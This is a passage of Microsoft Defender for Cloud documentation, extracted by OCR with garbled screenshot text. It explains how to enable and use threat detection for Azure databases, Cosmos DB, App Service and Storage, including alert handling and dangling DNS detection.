To get alerts from the Microsoft Defender plan you'll first need to enable it as shown 
below. 


Learn more about this Microsoft Defender plan in Overview of Microsoft Defender for 
open-source relational databases. 


Enable enhanced security 


1. From the Azure portal“, open the configuration page of the database server you 
want to protect. 


2. From the security menu on the left, select Microsoft Defender for Cloud. 


3. If enhanced security isn't enabled, you'll see a button as shown in the following 
screenshot. Select Enable Microsoft Defender for [Database type] (for example, 
"Microsoft Defender for MySQL") and select Save. 


Dashboard > Azure Database for MySQL servers > mysql11 


fa] mysqlI11 | Microsoft Defender for Cloud x 


Azure Database for MySQL server @ Directory: Microsoft 


» 


| p Search (Ctrl +) | « Recommendations Security alerts Microsoft Defender for MySQL: Disabled Learn more 

e About Microsoft Defender for Cloud 
aed 4 (1) 0 O About Microsoft Defender for MySQL 
E Activity log 
ha ian Microsoft Defender for MySQL 
@ Tags 


7 Microsoft Defender for MySQL detects anomalous activities indicating unusual and potentially harmful attempts to access or 
@ Diagnose and solve problems 
exploit databases. 


Settings You are invited to a 30-day trial, free of charge. After the trial ends, you will be charged $15/server/month 
E Connection security | EnableMicrosoftDefender for MySQL i 
Eè Connection strings S 


GO Server parameters 3 
Recommendations 


E Replication 
ala Active Directory admi Security Center continuously monitors the configuration of your SQL Servers to identify potential security vulnerabilities and 
recommends actions to mitigate them. 
% Pricing tier 
üi Description Ty Severity F 
I Properties 
A Locks Public network access should be disabled for MySQL servers A Medium 
Private endpoint should be enabled for MySQL servers A Medium 
Security 
Geo-redundant backup should be enabled for Azure Database for MySQL O Low 


Microsoft Defender for 
D cious 


Audit diagnostic setting O Low 
<l> Private endpoint connections 


A Y= View additional recommendations in Microsoft Defender for Cloud > 
E Data encryption 


Q Tip 


This page in the portal will be the same regardless of the database type 
(PostgreSQL, MySQL, or MariaDB). 


Respond to security alerts 


When Microsoft Defender for Cloud is enabled on your database, it detects anomalous 
activities and generates alerts. These alerts are available from multiple locations, 
including: 


e |n the Azure portal: 

o Microsoft Defender for Cloud's security alerts page - Shows alerts for all 
resources protected by Defender for Cloud in the subscriptions you've got 
permissions to view. 

o The resource's Microsoft Defender for Cloud page - Shows alerts and 
recommendations for one specific resource, as shown above in Enable 
enhanced security. 

e In the inbox of whoever in your organization has been designated to receive email 
alerts. 


Q Tip 


A live tile on Microsoft Defender for Cloud's overview dashboard tracks the status 
of active threats to all your resources including databases. Select the security alerts 
tile to go to the Defender for Cloud security alerts page and get an overview of 
active threats detected on your databases. 


For detailed steps and the recommended method to respond to security alerts, see 


Respond to a security alert. 


Respond to email notifications of security alerts 


Defender for Cloud sends email notifications when it detects anomalous database 
activities. The email includes details of the suspicious security event such as the nature 
of the anomalous activities, database name, server name, application name, and event 
time. The email also provides information on possible causes and recommended actions 
to investigate and mitigate any potential threats to the database. 


1. From the email, select the View the full alert link to launch the Azure portal and 
show the security alerts page, which provides an overview of active threats 
detected on the database. 


From: Microsoft Azure <azure-noreply@microsoft.com> 

Sent: Wednesday, May 19, 2021 12:17 PM 

Subject: Microsoft Defender for Cloud has detected suspicious 
activity in your environment 


a Microsoft Azure 


HIGH SEVERITY 


Microsoft Defender for Cloud has detected 
suspicious activity in your resource 


Suspected brute force attack 


A potential brute force attack has been 
detected on your resource. 


May 19, 2021 9:16 UTC 


D Affected PostgreSQL Server: mm Detected by 
postgres BE Microsoft 


View the full alert > 


Activity details 


Subscription DataPlayground 
(1ff-33-81b) 

Alert ID 2_592-807e 
8ae1bddd2ff3 


View active threats at the subscription level from within the Defender for Cloud 


portal pages: 


O Microsoft Defender for Cloud | Security alerts ~ x 


Showing 73 subscriptions 


A Search (Ctrl+/) « © Refresh E Cha 


sv E Open query GS Suppression rules & Security alerts map JU Sample alerts d Download csv report Q Guides & Feedback 


General Active alerts by severity 
© overview Active alerts Affected resources THigh (8) [Medium (5) Low (3) 


@ Getting started 


ZZ Recommendations [ Æ Search by ID, title, or affected resource Subscription == All Status == Active X Severity == Low, Medium, High >< Resource type == SQLServer X 
i + 
© security alerts E Add filter No grouping KA 
@ Inventory 
a Workbooks Severity 4 Alerttitle Ty Affected resource Ty Activity start time (UTC+3) Ty MITRE ATT&CK® tactics Status Ty 
GO Community | High N © Potential SQL Brute Force attempt B ZOO 05/09/21, 04:54 PM i Pre-attack Active 
Cloud Security l High @ Attempted logon by a potentially harmful application B ZOO 05/09/21, 04:54 PM E Pre-attack Active 
© secure Score High @ Potential SQL injection EEE 05/09/21, 04:54 PM Active 
i“) Regulatory compliance 
High @ Unusual export location B SEO 05/09/21, 04:54 PM GZ Exfiltration Active 
9 Microsoft Defender for Cloud 
© Workload protections High 9 Potential SQL Brute Force attempt a S-DB 04/06/21, 05:19 PM HA Pre-attack Active 
E Firewall Manager High DO Attempted logon by a potentially harmful application B SEO 04/06/21, 05:19 PM HA Pre-attack Active 
I Pricing & settings High @ Potential SQL injection B s-ps 04/06/21, 05:19 PM Active 
© Security policy High @ Unusual export location BW s-pe 04/06/21, 05:19 PM ZZ exiitration Active 
E Security solutions 
Medium D Logon from an unusual location B s-ps 05/09/21, 04:54 PM Active 
A Workflow automation 
Ge Medium @ A possible vulnerability to SQL Injection B RdfeTestResults 05/03/21, 11:48 PM Active 
'Â Coverage 
@ Cloud connectors Medium 9 A possible vulnerability to SQL Injection B RdfeTestResults 05/03/21, 11:48 PM Active 
Medium 9 Logon from an unusual location E Sample-DB 04/06/21, 05:19 PM Active 
Medium DO Logon from an unusual location B rdfetestresults 03/25/21, 09:47 PM E Initial Access Active 
Low 9 Login from an unusual data center B rdfetestresults 06/10/21, 09:27 PM g Initial Access 
Low @ Login from a principal user not seen in 60 days B, asql 05/10/21, 07:30 PM E Initial Access 
Low @ Login from a principal user not seen in 60 days B pusql 04/01/21, 12:10 AM g Initial Access Active 


2. For additional details and recommended actions for investigating the current 
threat and remediating future threats, select a specific alert. 


Active alerts by severity 
b 


High (8) EMedium (5) I Low (3) 


Ee Ọ Logon from an unusual location S 


P Search by | Subscription == All Status = 


Severity == Low, Medium, High >< Resource type ==All Medium 2‘. Active < © 03/25... 
i Add filter Severity Status Activity time 
No grouping Vv Alert description 
Someone logged on to your resource from an unusual location. 
g Severity 4 Alert title Ty Affected resource Ty Activit 
O | High @ Attempted logon by a potentially har... B Sample-DB 05/ 
Affected resource 
g | High @ Potential SQL injection @ Sample-DB 05/ E 
rdfetestresults 
g | High D Unusual export location @ Sample-DB 05/ 
? RDFE Lab Subscription 
g High D Potential SQL Brute Force attempt @ sample-D8 04/ Subscription 
o High @ Attempted logon by a potentially har... B Sample-DB DAI 
I High @ Potential SQL injection EB Sample-DB 04/ MITRE ATT&CK® tactics © 
C f Medium H @ Logon from an unusual location E rdfetestresults 03/ © Initial Access 
Oj Low @ Login from an unusual data center E rdfetestresults 06/ e E a, AE, A, JA, AE, E, AE, E, A @ @ 
g Low @ Login from a principal user not seen... & ninjasql 05/ 
g Low @ Login from a principal user not seen... B purviewninjasql DAO Ts action 
e 


@ Tip 


For a detailed tutorial on how to handle your alerts, see Tutorial: Triage, 
investigate, and respond to security alerts. 


Next steps 


e Automate responses to Defender for Cloud triggers 
e Stream alerts to a SIEM, SOAR, or ITSM solution 
e Suppress alerts from Defender for Cloud 


Overview of Microsoft Defender for 
Azure Cosmos DB 
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Microsoft Defender for Azure Cosmos DB detects potential SQL injections, known bad 
actors based on Microsoft Threat Intelligence, suspicious access patterns, and potential 
exploitation of your database through compromised identities, or malicious insiders. 


Defender for Azure Cosmos DB uses advanced threat detection capabilities, and 
Microsoft Threat Intelligence’ data to provide contextual security alerts. Those alerts 
also include steps to mitigate the detected threats and prevent future attacks. 


You can enable protection for all your databases (recommended), or enable Microsoft 
Defender for Azure Cosmos DB at either the subscription level, or the resource level. 


Defender for Azure Cosmos DB continually analyzes the telemetry stream generated by 
the Azure Cosmos DB service. When potentially malicious activities are detected, 
security alerts are generated. These alerts are displayed in Defender for Cloud together 
with the details of the suspicious activity along with the relevant investigation steps, 


remediation actions, and security recommendations. 


Defender for Azure Cosmos DB doesn't access the Azure Cosmos DB account data, and 
doesn't have any effect on its performance. 


Availability 


Aspect Details 

Release state: General Availability (GA) 

Protected Azure Cosmos DB API © Azure Cosmos DB for NoSQL 
x 


Azure Cosmos DB for Apache Cassandra 
* Azure Cosmos DB for MongoDB 

* Azure Cosmos DB for Table 

* Azure Cosmos DB for Apache Gremlin 


Clouds: OO Commercial clouds 
* Azure Government 
* Azure China 21Vianet 


What are the benefits of Microsoft Defender 
for Azure Cosmos DB 


Microsoft Defender for Azure Cosmos DB uses advanced threat detection capabilities 
and Microsoft Threat Intelligence data. Defender for Azure Cosmos DB continuously 
monitors your Azure Cosmos DB accounts for threats such as SQL injection, 
compromised identities and data exfiltration. 


This service provides action-oriented security alerts in Microsoft Defender for Cloud with 
details of the suspicious activity and guidance on how to mitigate the threats. You can 
use this information to quickly remediate security issues and improve the security of 
your Azure Cosmos DB accounts. 


Alerts include details of the incident that triggered them, and recommendations on how 
to investigate and remediate threats. Alerts can be exported to Microsoft Sentinel or any 
other third-party SIEM or any other external tool. To learn how to stream alerts, see 
Stream alerts to a SIEM, SOAR, or IT classic deployment model solution. 


@ Tip 


For a comprehensive list of all Defender for Azure Cosmos DB alerts, see the alerts 
reference page. This is useful for workload owners who want to know what threats 
can be detected and help SOC teams gain familiarity with detections before 
investigating them. Learn more about what's in a Defender for Cloud security alert, 
and how to manage your alerts in Manage and respond to security alerts in 
Microsoft Defender for Cloud. 


Alert types 


Threat intelligence security alerts are triggered for: 


e Potential SQL injection attacks: 
Due to the structure and capabilities of Azure Cosmos DB queries, many known 
SQL injection attacks can't work in Azure Cosmos DB. However, there are some 
variations of SQL injections that can succeed and may result in exfiltrating data 
from your Azure Cosmos DB accounts. Defender for Azure Cosmos DB detects 
both successful and failed attempts, and helps you harden your environment to 
prevent these threats. 


e Anomalous database access patterns: 
For example, access from a TOR exit node, known suspicious IP addresses, unusual 


applications, and unusual locations. 


e Suspicious database activity: 
For example, suspicious key-listing patterns that resemble known malicious lateral 
movement techniques and suspicious data extraction patterns. 


Next steps 


In this article, you learned about Microsoft Defender for Azure Cosmos DB. 


Enable Microsoft Defender for Azure Cosmos DB 


Enable Microsoft Defender for Azure 
Cosmos DB 
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Microsoft Defender for Azure Cosmos DB protection is available at both the 
Subscription level, and resource level. You can enable Microsoft Defender for Cloud on 
your subscription to protect all database types on your subscription including Microsoft 
Defender for Azure Cosmos DB (recommended). You can also choose to enable 
Microsoft Defender for Azure Cosmos DB at the Resource level to protect a specific 


Azure Cosmos DB account. 


Prerequisites 


e An Azure account. If you don't already have an Azure account, you can create your 


Azure free account today”. 


Enable database protection at the subscription 
level 


The subscription level enablement enables Microsoft Defender for Cloud protection for 


all database types in your subscription (recommended). 


You can enable Microsoft Defender for Cloud protection on your subscription in order 
to protect all database types, for example, Azure Cosmos DB, Azure SQL Database, 
Azure SQL servers on machines, and OSS RDBs. You can also select specific resource 
types to protect when you configure your plan. 


When you enable Microsoft Defender for Cloud's enhanced security features on your 
subscription, Microsoft Defender for Azure Cosmos DB is automatically enabled for all of 


your Azure Cosmos DB accounts. 

To enable database protection at the subscription level: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Environment settings. 
3. Select the relevant subscription. 


4. Locate Databases and toggle the switch to On. 


? Defender for Cloud plans will be enabled on 3 resources in this subscription 


~ Select Defender plan by resource type | Enable all | 


jnstance/Month ( On 
eS ~ 
On 
tes on EK 
o o b 
5. Select Save. 
To select specific resource types to protect when you configure your plan: 
1. Follow steps 1 - 4 above. 
2. Select Select types 
E Databases Protected: 0/30 instances Selected: 0/4 © 
Preview features included Select types > 


3. Toggle the desired resource type switches to On. 


Database types selection x 


Excluding and reincluding resource in the plan will affect the coverage 
and billing. If there are no resources in the subscription, billing won't 
apply even if the resource type is included. Learn more 


E Azure SQL Databases © dD On 
Pricing: 


Resource Quantity: 


ES sal servers on machines © dD On 


Pricing: 


Resource Quantity: 


D Open source relational databases © dD On 


Pricing: 


Resource Quantity: 


h 4 Azure Cosmos DB © dD On 


Pricing: 


Resource Quantity: 


conne ea 


4. Select Confirm. 


Enable Microsoft Defender for Azure Cosmos 
DB at the resource level 


You can enable Microsoft Defender for Cloud on a specific Azure Cosmos DB account 
through the Azure portal, PowerShell, Azure CLI, ARM template, or Azure Policy. 


To enable Microsoft Defender for Cloud for a specific Azure Cosmos DB account: 


Azure portal 


1. Sign in to the Azure portal £. 


2. Navigate to your Azure Cosmos DB account > Settings. 


3. Select Microsoft Defender for Cloud. 


4. Select Enable Microsoft Defender for Azure Cosmos DB. 


O myCosmosAccount | Microsoft Defender for Cloud 


Azure Cosmos DB account 


| Ø Search 


Default consistency 
& Point In Time Restore 
<l> Networking 

CORS 

Dedicated Gateway 
Keys 


Advisor Recommendations 


Orr poe 


Microsoft Defender for Cloud 
% Identity 


A Locks 


Integrations 

all Power BI 

GO Azure Synapse Link 

GO Add Azure Cognitive Search 


GO Add Azure Function 


@ Directory: Microsoft 


O For a comprehensive security plan that helps you protect against threats and manage security vulnerabilities across all resources in 


D Visit Microsoft Defender for Cloud to manage security across your virtual networks, data, apps, and more 


Microsoft Defender for Azure Cosmos DB 


Microsoft Defender for Azure Cosmos DB is an Azure-native layer of security that detects attempts to exploit databases in 
your Azure Cosmos DB SQL API accounts. 

Defender for Azure Cosmos DB SQL detects potential SQL injections, known bad actors based on Microsoft Threat 
Intelligence, suspicious access patterns, and potential exploitations of your database through compromised identities, or 
malicious insiders. 


Microsoft Defender for Cloud can protect all databases in your subscription, including Azure Cosmos DB, Azure SQL 
Database, Azure SQL servers on machines, and OSS RDBs. 
See how to enable Defender for Cloud on all the databases in your subscription 


Alternatively, you can enable protection on this specific Azure Cosmos DB account: 
Enable Microsoft Defender for Azure Cosmos DB 
You can start with a 30-day free trial. When the trial ends, you will be charged for the standard tier. Q 


© For Provisioned Throughput accounts, you will be charged $0.0012 per 100RU/s per hour. 
© For Serverless accounts, the total RU will be converted to provisioned throughput using a conversion factor Sfi 
0.00003125. Learn more 


Simulate security alerts from Microsoft 
Defender for Azure Cosmos DB 


A full list of supported alerts is available in the reference table of all Defender for Cloud 


security alerts. 


You can use sample Microsoft Defender for Azure Cosmos DB alerts to evaluate their 


value, and capabilities. Sample alerts will also validate any configurations you've made 


for your security alerts (such as SIEM integrations, workflow automation, and email 


notifications). 


To create sample alerts from Microsoft Defender for Azure Cosmos DB: 


1. Sign in to the Azure portal Z as a Subscription Contributor user. 


2. Navigate to the security alerts page. 


3. Select Sample alerts. 


4. Select the subscription. 


5. Select the relevant Microsoft Defender plan(s). 


6. Select Create sample alerts. 


Dashboard > Microsoft Defender for Cloud Create sample alerts (Preview) x 
Microsoft Defender for Cloud | Security alerts Try Microsoft Defender for Cloud alerts by creating sample 
Showing 9 subscriptions alerts from our different Microsoft Defender for Cloud plans. 


Learn more >> 


©) Refresh S Change status TZ Open query fO Create sample alerts Subscriptions 


HTA Sea 
ass 


Active alerts Affected resources [High (143) [Medium (442) [Lo Microsoft Defender for Cloud plans 
6 selected 
E D Select all 
P Search by ID, title, or affected resource Status == Active >< 
E App Services 
E Key Vaults 
g Severity 4 Alert title ty Affected resource Ty E Kubernetes Services 
. : ei Azure SQL Database 
O High @ Suspicious process executed E CH-VictimvMo0-D 
v] Storage Accounts 
o High @ Suspicious process executed E CH-victimvMoo0 
| ei Virtual Machines 
GR GE @ susnicious nracess execute... EE CH-victimvmMon-nD 


Previous Page | 1 wv | of 16 Next> | © Create sample alerts 


After a few minutes, the alerts will appear in the security alerts page. Alerts will also 
appear anywhere that you've configured to receive your Microsoft Defender for Cloud 
security alerts. For example, connected SIEMs, and email notifications. 


Next steps 


In this article, you learned how to enable Microsoft Defender for Azure Cosmos DB, and 
how to simulate security alerts. 


Automate responses to Microsoft Defender for Cloud triggers § 


Common questions about 
Defender for Databases 


FAQ 


Get answers to common questions about Microsoft Defender for Databases. 


If | enable this Microsoft Defender plan 
on my subscription, are all SQL servers 
on the subscription protected? 


No. To defend a SQL Server deployment on an Azure virtual machine, or a SQL Server 
running on an Azure Arc-enabled machine, Defender for Cloud requires: 


e a Log Analytics agent on the machine 
e the relevant Log Analytics workspace to have the Microsoft Defender for SQL 
solution enabled 


The subscription status, shown in the SQL server page in the Azure portal, reflects the 
default workspace status and applies to all connected machines. Only the SQL servers 
on hosts with a Log Analytics agent reporting to that workspace are protected by 
Defender for Cloud.Y 


Is there a performance effect from 
deploying Microsoft Defender for Azure 
SQL on machines? 


The focus of Microsoft Defender for SQL on machines is obviously security. But we also 
care about your business and so we've prioritized performance to ensure the minimal 


effect on your SQL servers. 


The service has a split architecture to balance data uploading and speed with 


performance: 


e Some of our detectors, including an extended events trace named 
SQLAdvancedThreatProtectionTraffic, run on the machine for real-time speed 


advantages. 


e Other detectors run in the cloud to spare the machine from heavy computational 
loads. 


Lab tests of our solution showed CPU usage averaging 3% for peak slices, comparing it 
against benchmark loads. An analysis of our current user data shows a negligible effect 
on CPU and memory usage. 


Performance always varies between environments, machines, and loads. The statements 


are provided as a general guideline, not a guarantee for any individual deployment. 


What happens to the old scan results 
and baselines after | switch to express 
configuration? 


Old results and baselines settings remain available on your storage account, but won't 
be updated or used by the system. You don't need to maintain these files for SQL 
vulnerability assessment to work after you switch to express configuration, but you can 
keep your old baseline definitions for future reference. 


When express configuration is enabled, you don't have direct access to the result and 
baseline data because it's stored on internal Microsoft storage. 


Can | set up recurring scans with 
express configuration? 


Express configuration automatically sets up recurring scans for all databases under your 
server. This is the default and isn't configurable at server or database level. 


Is there a way with express 
configuration to get the weekly email 
report that is provided in the classic 
configuration? 


You can use workflow automation and Logic Apps email scheduling, following the 
Microsoft Defender for Cloud processes: 


e Time based triggers 


e Scan based triggers 
e Support for disabled rules 


Why can't I set database policies 
anymore? 


SQL vulnerability assessment reports all vulnerabilities and misconfigurations in your 
environment, so it helps to have all databases included. Defender for SQL is billed per 
server, not per database. 


Can I revert back to the classic 
configuration? 


Yes. You can revert back to the classic configuration using the existing REST APIs and 
PowerShell cmdlets. When you revert back to the classic configuration, you see a 
notification in the Azure portal to change to the express configuration. 


Will we see express configuration for 
other types of SQL? 


Stay tuned for updates! 


Can | choose which experience is the 
default? 


No. Express configuration is the default for every new supported Azure SQL database. 


Does express configuration change scan 
behavior? 


No, express configuration provides the same scanning behavior and performance. 


Does express configuration have any 
effect on pricing? 


Express configuration doesn't require a storage account, so you don't need to pay extra 
storage fees unless you choose to keep old scan and baseline data. 


What does the 1-MB cap per rule mean? 


Any individual rule can't produce results that are more than 1 MB. When that limit is 
reached, the results for the rule are stopped. You can't set a baseline for the rule, the 
rule isn't included in the overall recommendation health, and the results are shown as 
"Not applicable”. 


Next steps 


Learn about Defender for Databases 


Overview of Defender for App Service 
to protect your Azure App Service web 
apps and APIs 
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Prerequisites 


Defender for Cloud is natively integrated with App Service, eliminating the need for 
deployment and onboarding - the integration is transparent. 


To protect your Azure App Service plan with Microsoft Defender for App Service, you'll 
need: 


e A supported App Service plan associated with dedicated machines. Supported 
plans are listed in Availability. 


e Defender for Cloud's enhanced protections enabled on your subscription as 
described in Quickstart: Enable enhanced security features. 
Tip 


You can optionally enable individual Microsoft Defender plans, like Microsoft 
Defender for App Service. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Microsoft Defender for App Service is billed as shown on the pricing 
page’ 


Billing is according to total compute instances in all plans 


Aspect Details 


Supported App Service The supported App Service plans are 
plans: e Free plan 

e Basic Service plan 

e Standard Service plan 

e Premium v2 Service Plan 

e Premium v3 Service Plan 

e App Service Environment v1 

e App Service Environment v2 

e App Service Environment v3 


Clouds: © Commercial clouds 


* National (Azure Government, Azure China 21Vianet) 


What are the benefits of Microsoft Defender 
for App Service? 


Azure App Service is a fully managed platform for building and hosting your web apps 
and APIs. Since the platform is fully managed, you don't have to worry about the 
infrastructure. It provides management, monitoring, and operational insights to meet 
enterprise-grade performance, security, and compliance requirements. For more 
information, see Azure App Service”. 


Microsoft Defender for App Service uses the scale of the cloud to identify attacks 
targeting applications running over App Service. Attackers probe web applications to 
find and exploit weaknesses. Before being routed to specific environments, requests to 
applications running in Azure go through several gateways, where they're inspected and 
logged. This data is then used to identify exploits and attackers, and to learn new 
patterns that will be used later. 


When you enable Microsoft Defender for App Service, you immediately benefit from the 
following services offered by this Defender plan: 


e Secure - Defender for App Service assesses the resources covered by your App 
Service plan and generates security recommendations based on its findings. Use 
the detailed instructions in these recommendations to harden your App Service 
resources. 


e Detect - Defender for App Service detects a multitude of threats to your App 
Service resources by monitoring: 
o the VM instance in which your App Service is running, and its management 
interface 


o the requests and responses sent to and from your App Service apps 

o the underlying sandboxes and VMs 

o App Service internal logs - available thanks to the visibility that Azure has as a 
cloud provider 


As a cloud-native solution, Defender for App Service can identify attack methodologies 
applying to multiple targets. For example, from a single host it would be difficult to 
identify a distributed attack from a small subset of IPs, crawling to similar endpoints on 
multiple hosts. 


The log data and the infrastructure together can tell the story: from a new attack 
circulating in the wild to compromises in customer machines. Therefore, even if 
Microsoft Defender for App Service is deployed after a web app has been exploited, it 
might be able to detect ongoing attacks. 


What threats can Defender for App Service 
detect? 


Threats by MITRE ATT&CK tactics 


Defender for Cloud monitors for many threats to your App Service resources. The alerts 
cover almost the complete list of MITRE ATT&CK tactics from pre-attack to command 
and control. 


e Pre-attack threats - Defender for Cloud can detect the execution of multiple types 
of vulnerability scanners that attackers frequently use to probe applications for 


weaknesses. 


e Initial access threats - Microsoft Threat Intelligence “ powers these alerts that 
include triggering an alert when a known malicious IP address connects to your 
Azure App Service FTP interface. 


e Execution threats - Defender for Cloud can detect attempts to run high privilege 
commands, Linux commands on a Windows App Service, fileless attack behavior, 
digital currency mining tools, and many other suspicious and malicious code 
execution activities. 


Dangling DNS detection 


Defender for App Service also identifies any DNS entries remaining in your DNS registrar 
when an App Service website is decommissioned - these are known as dangling DNS 


entries. When you remove a website and don't remove its custom domain from your 
DNS registrar, the DNS entry is pointing to a non-existent resource, and your 
subdomain is vulnerable to a takeover. Defender for Cloud doesn't scan your DNS 
registrar for existing dangling DNS entries; it alerts you when an App Service website is 
decommissioned and its custom domain (DNS entry) isn't deleted. 


Subdomain takeovers are a common, high-severity threat for organizations. When a 
threat actor detects a dangling DNS entry, they create their own site at the destination 
address. The traffic intended for the organization's domain is then directed to the threat 
actor's site, and they can use that traffic for a wide range of malicious activity. 


Dangling DNS protection is available whether your domains are managed with Azure 
DNS or an external domain registrar and applies to App Service on both Windows and 


Linux. 
` Active alerts by severity 
Active alerts Affected resources High (59) I Medium (626) [Low (138) 


Dangling DNS Record detected on App 
Service 


A Search by ID, title, .. Subscription == ASC DEMO Status == Active X 


Severity == Low, Medium, High >< Time == Lastmonth X Tr Add filter 


© 01/24/21, 12:4... 


High 31t Active 
Severity Activity time 


No grouping KA ty Status 


Affected resource Ty Status Ty 


Severity A Alert title Ty Activity start time (... Ty MITRE ATT&... 


= Sample-Storage 01/25/21, 11:13 AM TZ Pre-attack Active 


| High Ọ A.. Sample alert 


ZU Exfiltration Active 


High @ u... Sample alert BS Sample-Storage 01/25/21, 11:13 AM 


Alert description 


A DNS record that points to a recently deleted App Service resource has 
been detected. This is also known as “dangling DNS" entry and leaves you 
susceptible to a subdomain takeover. Subdomain takeovers enable malicious 


actors to redirect traffic intended for an organization's domain to a site 


Dangling DNS Recor... danglin 
o = Sees performing malicious activity. 


High @ Azure Security Cente...  Openshift-Cluster-1 CD Persistence Active 


High D Azure Security Cente... E ASC-Arc-OpenShift-.... 01/19/ CD Persistence Active 


Affected resource 


® dangling 
Web application laas 


CD Persistence Active ? Playground 
Subscription 


CD Persistence Active 


High D Azure Security Cente... $ ASC-Arc-K8S-demo DITA 


High D Azure Security Cente... $È ASC-Arc-Demo-clust... 01/14/21, 04:50 PM CD Persistence Active 


High D Azure Security Cente... $È aks-engine-arc-test-2 01/14/21, 01:26 PM 


C) Persistence Active 


CD Persistence Active 


CD Persistence Active Q 


9 A 
w Execution Active 


High D Azure Security Cente... E aks-engine-arc-test-2 01/14/21, 01:26 PM 


High D Azure Security Cente... M microsoft.azuredefe... 01/14/21, 11:12 AM 


High O Digital currency mini... @ app-lx 01/13/21, 12:38 PM 


High Ọ Digital currency mini... ® app-lx 01/13/21, 12:38 PM & Execution Active 


| High D Azure Security Cente... $ aks-engine-arc-test-2 01/14/21, 01:26 PM 
| 


Learn more about dangling DNS and the threat of subdomain takeover, in Prevent 
dangling DNS entries and avoid subdomain takeover. 


For a full list of the App Service alerts, see the Reference table of alerts. 


© Note 


Defender for Cloud might not trigger dangling DNS alerts if your custom domain 
doesn't point directly to an App Service resource, or if Defender for Cloud hasn't 
monitored traffic to your website since the dangling DNS protection was enabled 
(because there won't be logs to help identify the custom domain). 


Next steps 


In this article, you learned about Microsoft Defender for App Service. 


Enable enhanced protections 


For related material, see the following articles: 


e To export your alerts to Microsoft Sentinel, any third-party SIEM, or any other 
external tool, follow the instructions in Stream alerts to a SIEM, SOAR, or IT Service 
Management solution. 

e Fora list of the Microsoft Defender for App Service alerts, see the Reference table 
of alerts. 


e For more information on App Service plans, see App Service plans Z. 


Protect your applications with Defender 
for App Service 
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Azure App Service is a fully managed platform for building and hosting your web apps 
and APIs. It provides management, monitoring, and operational insights to meet 
enterprise-grade performance, security, and compliance requirements. For more 


information, see Azure App Service”. 


Microsoft Defender for App Service uses the scale of the cloud to identify attacks 
targeting applications running over App Service. Attackers probe web applications to 
find and exploit weaknesses. Before being routed to specific environments, requests to 
applications running in Azure go through several gateways, where they're inspected and 
logged. The data is then used to identify exploits and attackers, and to learn new 
patterns that are used later. 


When you enable Microsoft Defender for App Service, you immediately benefit from the 
following services offered by this Defender plan: 


e Secure - Defender for App Service assesses the resources covered by your App 
Service plan and generates security recommendations based on its findings. Use 
the detailed instructions in these recommendations to harden your App Service 


resources. 


e Detect - Defender for App Service detects a multitude of threats to your App 

Service resources by monitoring: 

o the VM instance in which your App Service is running, and its management 
interface 

o the requests and responses sent to and from your App Service apps 

o the underlying sandboxes and VMs 

o App Service internal logs - available thanks to the visibility that Azure has as a 
cloud provider 


As a cloud-native solution, Defender for App Service can identify attack methodologies 
applying to multiple targets. For example, from a single host it would be difficult to 
identify a distributed attack from a small subset of IPs, crawling to similar endpoints on 
multiple hosts. 


The log data and the infrastructure together can tell the story: from a new attack 


circulating in, the wild to compromises in customer machines. Therefore, even if 


Microsoft Defender for App Service is deployed after a web app has been exploited, it 
might be able to detect ongoing attacks. 


You can learn more about Defender for Clouds pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e You must have a supported App Service plan associated with dedicated machines. 


See the list of supported plans. 


Enable the Defender for App Service plan 


When you enable Defender for Cloud, you have the ability to add the Defender for App 
Service plan to your subscription to manage, monitor and gain operational insights to 
meet enterprise-grade performance, security, and compliance requirements for your 


machines. 
To enable Defender for App Service on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the App Service plan to On. 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free: 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. Select Save. 


Next steps 


Overview of Defender for App Service to protect your Azure App Service web apps and 
APIs 


Overview of Microsoft Defender for 
Storage 
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Microsoft Defender for Storage is an Azure-native layer of security intelligence that 
detects potential threats to your storage accounts. 

It helps prevent the three major impacts on your data and workload: malicious file 
uploads, sensitive data exfiltration, and data corruption. 


O Note 


This article is about the new Defender for Storage plan that was launched on March 
28, 2023. It includes new features like Malware Scanning and Sensitive Data Threat 
Detection. This plan also provides a more predictable pricing structure for better 
control over coverage and costs. Additionally, all new Defender features will only be 
added to the new plan. Migrating to the new plan is a simple process, read here 
about how to migrate from the classic plan. 


Microsoft Defender for Storage provides comprehensive security by analyzing the data 
plane and control plane telemetry generated by Azure Blob Storage“ , Azure Files Z, 

and Azure Data Lake Storage “ services. It uses advanced threat detection capabilities 
powered by Microsoft Threat Intelligence £ Microsoft Defender Antivirus, and Sensitive 
Data Discovery to help you discover and mitigate potential threats. 


Defender for Storage includes: 


e Activity Monitoring 
e Sensitive data threat detection (preview feature, new plan only) 
e Malware Scanning (new plan only) 


Access tokens 


leakage and abuse Credentials theft 


Lateral movement from 
compromised workloads 


Reconnaissance 
with search engines 


Compromised third-party 
partners with privileged permissions 


Malicious insiders that 
already have permissions 


Getting started 


With a simple agentless setup at scale, you can enable Defender for Storage at the 
subscription or resource levels through the portal or programmatically. When enabled at 
the subscription level, all existing and newly created storage accounts under that 
subscription will be automatically protected. You can also exclude specific storage 
accounts from protected subscriptions. 


O Note 


If you already have the Defender for Storage (classic) enabled and want to access 
the new security features and pricing, you'll need to migrate to the new pricing 
plan. 


Availability 


Aspect Details 
Release state: General Availability (GA) 


Feature - Activity monitoring (security alerts) - General Availability (GA) 
availability: - Malware Scanning — General Availability (GA) 
- Sensitive data threat detection (Sensitive Data Discovery) — Preview 


Pricing: - Defender for Storage: $10/storage accounts/month* 
- Malware Scanning (add-on): $0.15/GB (USD) of data ingested** 


Aspect 


Supported 
storage types: 


Required roles 
and 
permissions: 


Clouds: 


Details 


Above pricing applies to commercial clouds. Visit the pricing page “ to learn 
more. 


* Storage accounts that exceed 73 million monthly transactions will be charged 
$0.1492 for every 1 million transactions that exceed the threshold. 

** Billing begins on September 3, 2023. To limit expenses, use the Monthly 
capping feature to set a cap on the amount of GB scanned per month, per 
storage account to help you control your costs. 


Blob Storage £ (Standard/Premium StorageV2, including Data Lake Gen2): 
